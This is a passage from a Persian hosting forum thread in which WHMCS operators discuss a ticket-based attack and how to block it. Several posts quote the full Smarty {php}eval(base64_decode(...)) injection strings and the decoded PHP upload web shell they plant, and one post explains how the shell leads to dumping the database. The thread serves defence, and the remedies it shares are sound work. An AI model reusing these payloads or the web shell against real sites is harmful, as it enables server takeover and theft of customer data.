$code = base64_decode("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9In Bvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5h bWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvIC c8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0i NTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIG lkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlm KCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZi hAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRf RklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcG xvYWQgU1VLU0VTICEhITwvYj48YnI+PGJyPic7IH0NCgllbHNl IHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PG JyPic7IH0NCn0NCj8+");
$fo = fopen("downloads/b0x.php","w");
fwrite($fo,$code);
?>

و $code عبارته از:


<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>

با توجه به اين موارد ميتونيد جلوي مورد رو بگيريد.

بچه ها دارن خود کفا میشن تیکت اومده ولی کد فرق داره یه نفر دیکد کنه ببینه جدیده ؟


کاربر: iiiii gggggg #77
بخش: بخش فروش
موضوع: {php}eval(base64_decode(' JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRz hnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2 YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TF dSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhC c2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1 pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5U QWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSn pkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNi MkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMT kxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhB WTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WV cxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNk ZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVE lDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElI c2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3 ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8g PSBmb3Blbigia2lyLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJG NvZGUpOw=='));{/php}

من با whmcs کار نکردم اما اگر بی بی کد {php} رو غیر فعال بکنید فکر نکنم کسی بتونه کد پی اچ پی به این شکل رو ران بکنه.
دوستانی که استفاده کردن میتونن بگن.
=))خودکفا

بهتره یک تاپیک ایجاد بشه و آی پی و ایمیل هکران رو اعلام کنیم تا همه مسدود کنند

متأستفانه بدلیل آی پی های داینامیک در فضای اینترنت ایران امکان چنین کاری میسر نیست ...

مسخره بازی بعضی ها در این انجمن گل کرده است ! :))
اقایون، خواهشا پا نشوید بیاید هی یوزر بسازید تیکت بزنید !
خوبه که باگ بسته شده باز هم .... ! وقعا زشت هست ....

ایپی مسدود شده : 31.7.61.22
که می دانم از کی هم سرویس گرفتی و به ITJavani گزارش خواهد شد . :53:

حال میکنم خدایی
امشب فکر کنم همه سر کار باشین تا صبح:))

دوستان یک راه چازه به همه شما می گوییم و خلاص ...
چه باگ بسته باشید چه نه بسته باشید یک فایل .htaccess بسازید و توش محدودیت ایپی بگذارید ( طبق اموزش امنیتی بخش 4 خود سایت )
حال این .htaccess را یکی داخل پوشه ادمین ، یکی داخل پوشه templates_c یکی داخل پوشه downloads قرار دهید.
حالا اگر هکر 50 تا شل هم تزریق کنه قادر نیست اجراش کنه ! البته من همان Patch را نصبکردم تا حالا بیش از 15 تا کاربر سعی کردن تو سیستم من نفوذ کنند که ناکام ماندن !
و 99% از همین تاپیک پا می شن میان ! وقعا زشته ...

بهترین کار انتقال سه پوشه ی
اتنشن
تمپلت سی
دانلودز
به قسمت قبل از لوکال
به همین راحتی دیگه عمرا هک هم نمیشید

بهترین کار انتقال سه پوشه ی
اتنشن
تمپلت سی
دانلودز
به قسمت قبل از لوکال
به همین راحتی دیگه عمرا هک هم نمیشید

این که صحیح این راه هم میشه ...
اما مزاحمت های کاربران این انجمن و خارجی ها را چیکار کنیم که باعث خنده بعضی ها هم شده :


حال میکنم خدایی
امشب فکر کنم همه سر کار باشین تا صبح:))

چرا هر کی یه چیز میگه ؟

چرا هر کی یه چیز میگه ؟
چون هز دو راهش صحیح است !
اگر شما htaccess بسازی و ایپی را داخل محدود کنی هکر اگر شل هم بریزه نمی تواند اجرا کند !
اگر مانند دوستمان اون سه فایل پشت روت ببری شل اپلود میشود اما با چه ادرسی می خواهد اجرا کند ؟
و وقتی که Patch کنی همه اینها کشکه ! طرف میاد ثبت نام می کنه تیکت هم میزنه ! کارش نمیشه میره ....
فقط مزاحمتش برای ماست !

اگه امکان داره برای اینکه بی نظمی پیش نیاد یه تاپیک جامع بزنید و نتیجه گیری کنید

اگه امکان داره برای اینکه بی نظمی پیش نیاد یه تاپیک جامع بزنید و نتیجه گیری کنید

ماشالله 200 تا تاپیک جامع زده شده است !
تنها کار لازم این است : Security Patch - WHMCS Forums (http://forum.whmcs.com/showthread.php?t=43462)
همین !

من فایل هارو جایگزیم کردم دیگه مشکلی نداره ؟

توجه کنید پچ رو علاوه بر جایی که whmcs را نصب کردید داخل پوشه incloud هم قرار بدید
و دوم انتقال سه پوشه به قبل از روت
ولا پرمیشن فایل configuration.php رو 444 بزارید.
دوما کد های زیر رو در فایل configuration.php بزارید:


$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";


به جای username، نام کاربری هاستتونو بزارید. و همچنین این سه تا فولدر رو از هاست خارج کنید و به مسیری که در بالا گفته شده منتقل کنید.

من فایل هارو جایگزیم کردم دیگه مشکلی نداره ؟
خیر ...
در ضمن بچه ها هاست بیل خیلی قوی تر و گرافیت عالی شده !
تازه لیسانس ماهانش شده 5.95$ اصلا باور نکردنی است !
یکی پیدا بشه ماژول براش بنویسه من اولین کسی هستم که می خرم ...

[QUOTE=NovinServer;333827]خیر ...
QUOTE]


میشه بگی دیگه باید چی کار کرد ؟

دیگه تاپیکو ادامه ندین این کارارو انجام بدین حله

توجه کنید پچ رو علاوه بر جایی که whmcs را نصب کردید داخل پوشه incloud هم قرار بدید
و دوم انتقال سه پوشه به قبل از روت
ولا پرمیشن فایل configuration.php رو 444 بزارید.
دوما کد های زیر رو در فایل configuration.php بزارید:


$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";


به جای username، نام کاربری هاستتونو بزارید. و همچنین این سه تا فولدر رو از هاست خارج کنید و به مسیری که در بالا گفته شده منتقل کنید.

من این کار هارو انجام دادم درسته ؟
دسترسی فایل configuration.php v کردم 444 و بعد کد زیر رو گذاشتم توش


$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";

یوزر نیم سایت هم وارد کردم

3 پوشه هم بردم قبل public_html


درسته ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

---------- Post added at 11:37 PM ---------- Previous post was at 11:35 PM ----------

الان سایتم ترکید که

حتما اشتباه انجام دادی
میدونم اشکالت کجاست
باید اون کد هارو داخل فایل کانفیگ و قبل از
<؟
بذاری
احتمالا شما بعد از این گذاشتی

کد هارو توی configuration.php
و بعد از آخرین خط گذاشته بودم

قبل از <? بذار

---------- Post added at 11:49 PM ---------- Previous post was at 11:46 PM ----------

این جوری باید بشه
کانفیگت

<?php
$license = "Leased-00000000000000";
$db_host = "localhost";
$db_username = "0000000000000000000";
$db_password = "000000000000000000000";
$db_name = "0000000000000000000000000";
$cc_encryption_hash = "0000000000000000000000000000000000000";
$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";
?>

دستت درد نکنه

دیگه خیالت راحت بذار تا صبح بهت تیکت بزنن
خودتم به خودت هی تیکت بزن اگه حوصلت سر رفت
فقط بشین آیپی هکر جمع کن و بخند

سلام.

دوستان خواهشمند است هرگونه آی پی و یا ایمیل که قصد سو استفاده را دارد بیان فرمایید تا اقدام لازم صورت گیرد.(از تمامی دوستان این خواسته را داریم)

باتشکر.

مگه یکی دو تا آیپیه؟
بعد خداتا وی فیی ان ریخته هر کی با اون میزنه
علاوه بر کارایی که من گفتم یه پیشنهاد دیگه اینه که از قسمت Spam Control در مدیریت whmcs این دو کد هک رو مسدود کنید
به همین راحتی
حتی کلمه ی php ببندین تا داخل سابجکت اجازه استفاده نداشته باشه

مگه یکی دو تا آیپیه؟
بعد خداتا وی فیی ان ریخته هر کی با اون میزنه
علاوه بر کارایی که من گفتم یه پیشنهاد دیگه اینه که از قسمت Spam Control در مدیریت whmcs این دو کد هک رو مسدود کنید
به همین راحتی
حتی کلمه ی php ببندین تا داخل سابجکت اجازه استفاده نداشته باشه

اگر شما و سایر دوستان آی پی را محبت کنید هرچند ۱ یا ۲ و یا ۱۰۰ عدد باشد خود به ما کمک خواهد کرد.
ضمنا اگر می شود یک بار آموزش کامل جلوگیری را مجددا در یک پست مجزا بفرمایید تا ما و دوستان بهره ببریم(اینگونه که هرکس یک چیز می گوید موجب گمراهی خواهد شد. اگر جامع و کامل باشد بسیار مناسب است)

همکاران لطفا آی پی ها و ایمیل هارو اعلام کنند دوستانی قصد حرکت دسته جمعه به سمت دادسرای جرائم رو دارند

به خدا بار ها این کارو کردم اما الان کامل مینویسم (فقط تشکر فراموش نشه)
اول از همه نصب پچ امنیتی که در آدرس زیر هست
Security Patch - WHMCS Forums (http://forum.whmcs.com/showthread.php?t=43462)
و دومین کار انتقال سه پوشه ی templates_c و attachments و downloads به لوکال یعنی جایی که به صورت پیش فرض بکاپ گرفته شده از سیپنل ذخیره میشه
بعد برید داخل فایل
configuration.php
و اونو به این شکل در بیارید

<?php
$license = "Leased-00000000000000";
$db_host = "localhost";
$db_username = "0000000000000000000";
$db_password = "000000000000000000000";
$db_name = "0000000000000000000000000";
$cc_encryption_hash = "0000000000000000000000000000000000000";
$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";
?>
به جای username نام کاربری یوزر سیپنل رو بنویسید
و کار آخر هم اینه که برید قسمت Spam Control درون مدیریت whmcs و تو قسمت سابپکت دو کد هک

{php}eval(base64_decode(' JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRz hnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2 YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TF dSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhC c2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1 pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5U QWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSn pkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNi MkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMT kxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhB WTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WV cxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNk ZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVE lDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElI c2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3 ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8g PSBmb3Blbigia2lyLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJG NvZGUpOw=='));{/php}

و

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ q MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMT FiSFJwY0dGeWRDOW1iM0p0TFdS aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2 IyRmtaWElpUGljN0RRcGxZMmh2 SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm 1sc1pTSWdjMmw2WlQwaU5UQWlQ anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0 p0YVhRaUlHbGtQU0pmZFhCc0lp QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG 1LQ0FrWDFCUFUxUmJKMTkxY0d3 blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2 VTZ2tYMFpKVEVWVFd5ZG1hV3hs SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYk dVblhWc25ibUZ0WlNkZEtTa2dl eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVH d2WWo0OFluSStQR0p5UGljN0lI ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZE JSMEZNSUNFaElUd3ZZajQ4WW5J K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKC Jkb3dubG9hZHMvYjB4LnBocCIs InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php}را بلوک کنید

به همین راحتی
دسترسی فایل کانفیگم بذارید رو 444

فقط پچ رو علاوه بر جایی که
whmcs
رو نصب کردید داخل
include
هم نصب کنید
لطفا دیگه اسپم ندید تا این آموزش بمونه

اینم آیپی و ایمیل خرابکاران بعضی هاشون البته
31.7.61.22
46.19.139.252
takfile22@yahoo.com
188.158.211.136

سلام دوستان.
با کمک شرکت فراسو آی پی حمله کننده به ما نیز یافت شد: 188.138.100.80

طبق http://whois.domaintools.com/188.138.100.80، دامنه irrapid.com برای شخص هکر می باشد.
بزودی مراحل شکایت طی خواهد شد.

موفق باشید.

سلام دوستان.
با کمک شرکت فراسو آی پی حمله کننده به ما نیز یافت شد: 188.138.100.80

طبق http://whois.domaintools.com/188.138.100.80، دامنه irrapid.com برای شخص هکر می باشد.
بزودی مراحل شکایت طی خواهد شد.

موفق باشید.

مطمئنی ؟!

بعید میدونم . یه پیگیری دقیق تر از صاحب آی پی یا دامنه داشته باشید

چی بگم والا این قضیه هک شدنها خیلی دردسر ساز شده برای خیلی از هاستینگ ها

به نظرم برید تو پیام خصوصی بریزید رو سرو کله ی هم
نه پست هاتون به عنوان تاپیک میخوره نه چیز دیگه
ببینم دعواتون به کجا میرسه

:109:هر تاپیکی سر میزنی توش یکی با اونیکی داره دعوا میکنه!!8-}

هاستینگ در این جد شغل جنجالی هست؟:d

برای ما هم امروز از آی پی 173.236.125.246 تیکت زدند اما بدلیل نصب پچ مربوطه هیچ صدمه ای ندیدیم

از این آی پی هم با ما
178.168.5.5

این تاپیک هم شده، محلی برای یادگیری یک سری بچه که برن مثلا سایتها رو هک کنن!!!!
ولی سرشون به سنگ میخوره =))

همکاران لطفا آی پی ها و ایمیل هارو اعلام کنند دوستانی قصد حرکت دسته جمعه به سمت دادسرای جرائم رو دارند

زیاد خودتو ناراحت نکن! اگر شما که دم از شکایت و دادسرا میزنین 2000 ای پی هم بهتون بدن اخرش باید تو همین تاپیک دنبال path باشید :ی

سلام
دوستان دیروز هم رو سایت ما همچین تیکتی زده بودن ، من هم تیکت و هم یوزر رو حذف کردم ، وقت نکردم این 15 صفحه تاپیک رو دنبال کنم ، سایت ما هیچ تغییری توش داده نشده ! ، این هک دقیقا چیکار میکنه سایت رو چه دسترسی پیدا میکنه هکر؟ و اینکه الان من چیکار کنم 8-}
آی پی طرف 31.7.61.22
ایمیلی هم که ثبت کرده بود 4scriptman@gmail.com که متاسفانه وقتی سرچ میکنی تو گوگل به همین فروم هدایت میشی!! (لطفا مدیران این مورد رو یه پیگیری بکنن)

ما که مشکلی پیدا نکردیم
دوستان


92.50.50.132 2011/12/08 01:27
2.176.235.160 2011/12/07 11:39
31.7.61.22 2011/12/10 12:25


دوستانی که dedicated از سوئیس میدن
31.7.61.22
رو حتما پیگیری کنید.

دوستانی که dedicated از سوئیس میدن
31.7.61.22
رو حتما پیگیری کنید.

سلام.
درست می فرمایید این آی پی زیاد بدنبال خرابکاری بوده است !
ما پیگیری کردیم ولی برای مشتریان سرور سوئیس ما نبود.

موفق باشید.

سلام
دوستان دیروز هم رو سایت ما همچین تیکتی زده بودن ، من هم تیکت و هم یوزر رو حذف کردم ، وقت نکردم این 15 صفحه تاپیک رو دنبال کنم ، سایت ما هیچ تغییری توش داده نشده ! ، این هک دقیقا چیکار میکنه سایت رو چه دسترسی پیدا میکنه هکر؟ و اینکه الان من چیکار کنم
آی پی طرف 31.7.61.22
ایمیلی هم که ثبت کرده بود 4scriptman@gmail.com که متاسفانه وقتی سرچ میکنی تو گوگل به همین فروم هدایت میشی!! (لطفا مدیران این مورد رو یه پیگیری بکنن)

به دلیل اسپم بازار شدن اینجا یه تاپیک جدید باز کردم لطفا اونجا هیچ پستی ندید
http://www.webhostingtalk.ir/f178/36259/#post334440

درست می فرمایید این آی پی زیاد بدنبال خرابکاری بوده است !

تایید میشه

دوستان سوالی دارم
اگر روی اون تیکت کلیک نشه مشکلی پیش نمیاد؟
متاسفانه من کلیک کردم و بعداً دیدم کل فایل sql سایت توی downloads ایجاد شده
این نشون میده با کلیک من روی اون تیکت این اتفاق افتاده؟ یا نه موقع آپلود b0x.php همون موقع هکر این رو گرفته؟
این احتمال هست که این کد ایمیل کرده باشه کل فایل sql رو؟! :(
چه داستانی شده خیلی ناراحتم

تمام پسوردهارو عوض کنید سریع
این فایل
b0x رو حذف کنید
بعد مثل آموزش زیر عمل کنید
http://www.webhostingtalk.ir/f178/36259/#post334440

خدمت دوستان عزیز عرض کنم
روش این هک به این صورته
کد وقتی در تیکت ارسال میشه
فایل آپلودر در پوشه دانلود ایجاد میشه
b0x.php
سپس هکر با یک اسکریپت شل به راحتی میتونه دسترسی به فایل
مثل c99shell
معروف
configuration
و سپس خوندن مشخصات کامل دیتابیستون کنه
فایل شل هم بصورت
base64
آپلود کردن دهن سرویس ها
چون آنتی ویروس های سرور به سرعت شناساییش میکنن
حتی برای محکم کاری ظاهراً هر فایلی آپلود میشه آنتی ویروس سی پنل چک میکنه
اینا با یه روش نابغه گرانه
فایل رو بصورت
gzip
شده آپلود کردن و بعد از حالت کمپرس خارج کردن

سپس با همون شل میره وصل میشه به دیتابیس مربوطه و همه چیو دامپ و دانلود میکنه
patchi
هم که داده شده میاد این راه رو از طریق اصلاح فایل
functions
میبنده

جالبه بدونین
این گروهی که این هک رو داده
از اکسپلویت اخیر
Local File Disclosure
استفاده کاملتری کرده
و این مورد رو داده بیرون
با اینکه خودم طعمه این هک شدم و احساس بسیار بدی دارم که تمام تلاشام بی هوده بوده و از بین خواهد رفت
اما کارشون رو در نوشتن و اجرای این هک فوق العاده تحسین میکنم!

ضمناً اینم در نظر داشته باشید
تغییر و کم کردن سایز
text
در
submitticket
بی فایده هست و راه دور زدنش بسیار راحته!
(کاری که یکی از دوستان پیشنهاد داده بود)

الان میفهمم رعایت خیلی از نکات امنیتی
نه تنها بیمورد نیست
بلکه شرط کافی نیز نیست!
از جمله نصب این سیستم روی یک سرور جدا
استفاده نکردن از هاستینگ اشتراکی
نصب نداشتن سیستم های
cms
دیگر
استفاده نکردن از سیستم نال
و استفاده از لایسنس اصل
اصول حفاظت از اطلاعات مهم یک سایت هست

این مورد تجربه ای خواهد شد برای من و همه دوستان
گرچه ما ایرانیارو جون به جونمون کنن کار خودمونو میکنیم

فقط امیدوارم استفاده نا صحیح از اطلاعات دیتابیس من و خیلی دیگر از دوستان نشه
خیلی ناراحت کنندست اما به هر حال اتفاقیه که افتاده
ازین به بعد مراقب باشید

از قدیم گفتن اول امنیت خودتو رعایت کن
بعد خر د ز د رو بچسبین
مایی که درمون رو قفل نزدیم
اینقدر دنبال اینکه کی مارو هک کرده نباشیم و این حرفای حاشیه ای
این جوجه هکر این کارو نمیکرد یکی دیگه میکرد

حالا سایت های خارجی رو ببینید
با این همه اطلاعات کارت های اعتباری ذخیره شده و لو رفته
ما که هیچی!

فقط یادتون باشه
اگر یکبار هک شده باشید
ممکنه هکر توی هر پوشه ای به هر اسمی یه شل گذاشته باشه!
پس بسیار مراقب باشید

همچنین منتظر فروش دیتابیس های سایت های بیچاره در روزهای آتی باشید
چه لذت و منفعتی برای اونا و چه بیچارگی برای ما خواهد داشت...

و در آخر پیشنهاد میکنم دستپاچه نشین قبل از هر کاری یه بک آپ از کل سیستم و فایلاتون بگیرین که اگه یه عوضی زد همشو پاک کرد وضع ازین بدتر نشه!
همینطور اگر چند سیستم WHMCS دارین همشونو آپدیت کنید
با آپدیت جدید میگه hacking attempt! و مشکل حل میشه!

و سخن آخر با کسایی که اینکارو کردن یا میخوان بکنن
فکر نکنید با تغییر آی پی هر کاری خواستین میکنید
مطمئن باشید کسانی توی این فروم هستن که به راحتی پیداتون میکنن
و اونوقت دیگه کار از کار گذشته
مطمئن باشید کسایی که هک شدن بی کار نخواهند نشست

امیدوارم مطالب عنوان شده برای دوستان مفید واقع شده باشه

خدمت دوستان عزیز عرض کنم
روش این هک به این صورته
کد وقتی در تیکت ارسال میشه....




سلام تیبل های دیتا بیس را هم اموزش میدادید که ملت کارشون برای هک و ***ی اطلاعات کاربران را حت تر باشه :39:
این تاپیک لعنتی نقش مهمی تویه این هک ها داشت و اینا یک مشت جوجه هکرند وگرنه اصلا نیازی به اپلود شل نیست راه های راحت تری هم هست

سلام
دوستان حتما Patch امنیتی را اعمال کنند
من چند وقت پیش از طرف یک از تیم های هک ایرانی سایتم هک شد
که تمام اطلاعات سایت را حذف و مجدد آپلود کردم و patch را نصب کردم وتمام موارد امنیتی هم رعایت کردم تا حالا هم هیچ مشکلی نداشتم
با رعایت موارد امنیتی می توانید جلو هک را بگیرید
تایپیک مفید
آموزش رفع مشکل امنیتی whmcs (http://www.webhostingtalk.ir/f178/36259)

در ضمن ایمیل و هم چنین ip هکر را در این تایپیک اعلام کنید

آی پی من کسی که به من حمله کرد

188.50.52.64

---------- Post added at 06:50 PM ---------- Previous post was at 06:41 PM ----------


بچه ها دارن خود کفا میشن تیکت اومده ولی کد فرق داره یه نفر دیکد کنه ببینه جدیده ؟

یه بار دیکد می شه این

$code = base64_decode("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9In Bvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5h bWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvIC c8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0i NTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIG lkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlm KCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZi hAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRf RklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcG xvYWQgU1VLU0VTICEhITwvYj48YnI+PGJyPic7IH0NCgllbHNl IHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PG JyPic7IH0NCn0NCj8+");
$fo = fopen("kir.php","w");
fwrite($fo,$code);


توی این یه کد شده هست که دیکدش می شه


<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>

تاپیک قفل شد
فکر کنم همه فهمیدن ، دیگه نیازی به ادامه نیست